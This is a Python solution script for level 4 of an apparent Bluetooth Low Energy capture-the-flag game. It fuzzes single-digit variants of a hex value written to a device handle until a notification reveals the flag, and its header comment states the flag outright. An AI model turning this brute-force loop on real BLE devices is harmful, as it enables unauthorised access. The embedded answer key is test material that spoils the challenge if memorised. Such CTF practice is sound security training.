Fork: 0
0xRoM / BLE_CTF_V2
Transfer to URL with SHA Find file
Newer
Older
BLE_CTF_V2 / lvl_04.py
root on 11 Mar 2022 2 KB tidying for public release
Raw Blame History 
#! /usr/bin/python
import binascii
import struct
import sys, os, time
import bluepy.btle as btle
import itertools
  
'''
42  0x2A   READ         Handle 0x002C takes value AABBCCDDEEFF. Fuzz a varient of this to find the flag!
44  0x2C   NOTIFY WRITE 
46  0x2E   READ WRITE   write here to goto to scoreboard

Flag: f401f21d02fdd0a4fc00
'''

notificationData = ""

class MyDelegate(btle.DefaultDelegate):
  def __init__(self, hndl):
    btle.DefaultDelegate.__init__(self)
    self.hndl=hndl;

  def handleNotification(self, cHandle, data):
    global notificationData
    notificationData = data
    #print("d: "+data)

deviceMAC = open('ctf_mac.txt').read()  
p = btle.Peripheral(deviceMAC)

print ("Attached to peripheral")

print("Loading level 04")
hex1 = binascii.unhexlify(str('%0*x' % (4,4)))
p.writeCharacteristic(0x30, hex1, withResponse=False)
p.disconnect()

'''
# of course not, this brute-force would make sense!
charset = "01234565789ABCDEF"
generator = itertools.chain.from_iterable((''.join(l)
  for l in itertools.product(charset, repeat=i))
  for i in range(4,5))
'''

'''
# not this!
print("Generating wordlist")
charset = "01234565789ABCDEF"
generator = itertools.chain.from_iterable((''.join(l)
  for l in itertools.product(charset, repeat=i))
  for i in range(12,13))
'''

print("Generating wordlist")
generator = list()
charset = list("0123456789ABCDEF")
origPass = list("AABBCCDDEEFF")
for x in range(len(origPass)): 
  newPass = list("AABBCCDDEEFF")
  for y in range(len(charset)):
    newPass = list("AABBCCDDEEFF")
    newPass[x] = charset[y]
    generator.append("".join(newPass))

for password in generator:
  hexlif2 = binascii.unhexlify(password)
  hexlif2 = str(hexlif2)

  deviceMAC = open('ctf_mac.txt').read()  
  p = btle.Peripheral(deviceMAC)

  try:
    srvs = (p.getServices());
    chs=srvs[2].getCharacteristics();
    ch=chs[1];
    cccd = ch.valHandle + 1
    #print(str(ch)+str(ch.propertiesToString())); # print charchteristic's properties i.e. READ, WRITE, NOTIFY

    p.setDelegate(MyDelegate(ch.getHandle()));
    svc=p.getServiceByUUID(0x00FF)
    p.writeCharacteristic(cccd, b"\x01\x00");

    sys.stdout.write("\rTrying: %s" % password.rstrip())
    response = p.writeCharacteristic(0x2C, hexlif2)

    gotResponse = False
    while gotResponse == False:
      if p.waitForNotifications(1.0):
        rsp = notificationData
        hex = binascii.b2a_hex(rsp)
        hexstr = str(hex).strip("0").upper()
        #sys.stdout.write(" Response: " + hexstr) # for debugging
        
        if(password.strip("0") != hexstr):
          print("\nFlag: %s" % notificationData.rstrip())
          exit()
        else:
          gotResponse = True
          continue
      print "Waiting..."    
    
  finally:            
    p.disconnect()